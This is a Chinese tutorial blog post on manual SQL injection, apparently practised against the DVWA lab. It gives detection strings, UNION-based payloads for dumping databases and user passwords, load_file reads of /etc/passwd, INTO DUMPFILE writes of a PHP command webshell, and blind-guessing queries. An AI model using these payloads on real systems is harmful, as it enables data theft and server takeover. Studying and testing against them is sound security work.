美文网首页
手工SQL注入

手工SQL注入

作者: FateKey | 来源:发表于2018-02-01 13:36 被阅读0次

出现原因

服务器程序将用户输入的参数作为查询条件,服务器对参数不严格校验就拼接sql语句。

SELECT * FROM users WHERE user='uname' AND password='pass'
SELECT * FROM users WHERE user='name' AND password='' OR ''=''

漏洞发现

报错检测
' " % ()

布尔检测
1' and '1'='1 | 1' and '1
1' and '1'='2 | 1' and '0

手工注入流程

1.判断sql语句查询了几个字段

'order by 9--+(--后必须有空格,在url上空格等同于+)

2.联合查询

' union select 1,2--+

常用函数

user() -- DB用户
version() -- DB版本
char() -- ascii转字符串
database() -- 当前库
CONCAT_WS() -- 连接字符串,如CONCAT_WS(CHAR(32,58,32),user(),database(),version())
md5() -- 计算md5值
全局函数
@@datadir -- 数据库路径
@@hostname -- 主机名
@@VERSION -- DB版本
@@version_compile_os -- 系统版本

Mysql数据结构

information_schema -- 略

联合查询

所有库和所有表
'union select table_name,table_schema from information_schema.tables--+
列出库和库里表的数量
'union select table_schema,count(*) FROM information_Schema.tables group by table_schema--+
查指定库的表
'union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+
查指定表的列
'union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--+
查指定列的内容
'union select user,password from dvwa.users--+
'union select null, concat(user,0x3a,password) from users--+

sql注入其他利用方法

读取文件
'union SELECT null, load_file('/etc/passwd')--+
写入文件
'union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/ www/a.php" --+

没有权限写入www目录时可以考虑写入/tmp目录,然后使用文件包含
可以通过编码为16进制格式绕过字符限制

' union select null, (0x3c3f706870) INTO DUMPFILE '/tmp/x.php'--+
cat php-revers-shell.php | xxd -ps | tr -d '\n'
保存数据库
' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--

特殊情况下的sql注入

无权读取information_schema库和拒绝union、order by语句

猜列名
' and column is null--+(使用工具进行fuzz)
猜当前表
' and table.user is null--+(有可能找到其他表)
猜其他表
' and (select count(*) from table)>0--+
猜指定表的列
' and users.user is null--+
猜字段内容
' or user='admin'--+
' or user like '%a%'--+

当数据库可写

利用insert,update和delete注入获取数据

盲注

盲注是不能通过直接显示的途径来获取数据库数据的方法。
分为:
Booleanbase(布尔型)
Timebase(时间型)
Errorbase(错误型)

相关文章

  • 手工SQL注入

    出现原因 服务器程序将用户输入的参数作为查询条件,服务器对参数不严格校验就拼接sql语句。如SELECT * FR...

  • 2019-11-13

    mysql手工注入 一、SQL注入的理解 将特殊SQL语句添加到查询url后面,以获取非法的数据的操作。 ...

  • SQL注入-手工注入方法

    库名 表名 不使用双引号也可直接使用十六进制(0x****) 列名 数据 核心语法

  • Sql注入之sqlmap+dvwa实例演练

    相信很多同学都已经知道了什么是sql注入,也明白为什么会发生sql注入。也可以通过在输入框和url中“手工”注入,...

  • access数据库注入2-墨者靶场access注入

    https://www.mozhe.cn/bug/detail/89 手工注入 开启靶场后,既然说明了是sql注入...

  • web训练sql注入中级练习-墨者学堂

    sql注入实战mysql(进阶版) 看这个是base64编码 手工注入注入不出来。。。 使用sqlmap跑提示使用...

  • SQL Sever手工注入

    判断数据库类型 以http://www.xxx.com/xxx.asp?id=xx为例子,如果用单引号、and 1...

  • 【转】手工sql注入

    1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3....

  • SQL手工注入-记录

    https://www.cnblogs.com/vame1/p/5776808.html 比方说在查询id是50的...

  • Sqlmap初学 实验吧 简单的SQL 一

    在学习sql注入的过程中,一开始只想着怎么手工注入,却发现手工注入的道路,说麻烦不麻烦,但是说简单也很不简单,相...

网友评论

      本文标题:手工SQL注入

      本文链接:https://www.haomeiwen.com/subject/dlbqzxtx.html